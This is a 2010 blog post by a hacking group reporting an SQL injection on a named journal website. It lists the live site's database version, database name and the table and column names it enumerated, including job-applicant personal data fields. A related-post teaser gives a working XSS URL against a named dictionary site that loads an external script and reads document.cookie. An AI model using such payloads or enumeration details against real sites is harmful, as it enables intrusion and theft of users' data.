Critical SQL Injection in http://www.ecovisionjournal.com – Weekly Journal – PlanetCreator’s Security Team and Hackers Group

Home / Hacking, News, Security / Critical SQL Injection in http://www.ecovisionjournal.com – Weekly Journal

Critical SQL Injection in http://www.ecovisionjournal.com – Weekly Journal

September 2, 2010 PlanetCreator 0 Comments 0 tags

Security Researcher $@T0R! reported another Critical SQL Injection in http://www.ecovisionjournal.com – Weekly Journal

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typedÂ and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.

This is critical and reported to webmaster:

These are some info and screenshots from vul site:

5.0.45-community-nt:[email protected]:ecobase

Tables eco_comment_type,eco_mail_list,eco_month_list,eco_poll_qus,eco_reader_digest, eco_tbl_applicant,eco_tbl_article,eco_tbl_category,eco_tbl_comment,eco_tbl_coverstory, eco_tbl_data,eco_tbl_health,eco_tbl_interview,eco_tbl_issue,eco_tbl_joke,eco_tbl_member, eco_tbl_news,eco_tbl_product,eco_tbl_yzone,eco_vote_ans,eco_year_list

Columns
id,type,NO,name,mail,ID,mName,yID,pno,pTitle,RID,Header,Pic,issue,rate,shortnotes, detaildata,appNo,Name,DOB,NRC,Address,Email,Education,Skill,Experience,CurrentJob, Company,Office,AppliedFor,Shift,CurrentSalary,ExpectedSalary,ContactNo,Photograph, ApplyTo,ID,title,apath,Img,issue,rate,shortnotes,ID,cName,id,comment,type_id, time,Isshow,volume

We hope that your security staff will look into this issue and fix it as soon as possible.

Explore More

How to hack a website? â€“ Tips and tricks

Here are the most common techniques used to hack a website Hacking sites that are least protected by password â€“ By pass authentication Itâ€™s the webmasterâ€™s nightmare, hackers accessing the

critical XSS Vulnerability on Ayar Myanmar-English Dictionary

PlanetCreator has reported another critical XSS Vulnerability on Ayar Myanmar – English Dictionary Website :Â Â Â Owned by Ayar Myanmar Unicode Group. Test XSS : http://myanmardictionary.co.cc/feedback.php?page=1&q=%27%22%3E%3C%2Ftitle%3E%3Cscript%20src=http://www.planetcreator.net/attacking/xss/planetcreator-xss.js%3Ealert%28document.cookie%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+PlanetCreator%3C%2Fh1%3E%3C%2Fmarquee%3E This vulnerability has been alerted

Rooting webhost

r00ting a webhost Introduction: Well taking over a host isnt as easy as you may think. There is a fairly big process involved and a lot of fidiling around. Below

[remote] Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection
on April 4, 2025 at 12:00 am
Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection
[remote] Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS)
on April 4, 2025 at 12:00 am
Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS)
[remote] Angular-Base64-Upload Library 0.1.20 - Remote Code Execution (RCE)
on April 4, 2025 at 12:00 am
Angular-Base64-Upload Library 0.1.20 - Remote Code Execution (RCE)
[remote] Vite 6.2.2 - Arbitrary File Read
on April 3, 2025 at 12:00 am
Vite 6.2.2 - Arbitrary File Read
[webapps] ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials
on April 3, 2025 at 12:00 am
ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials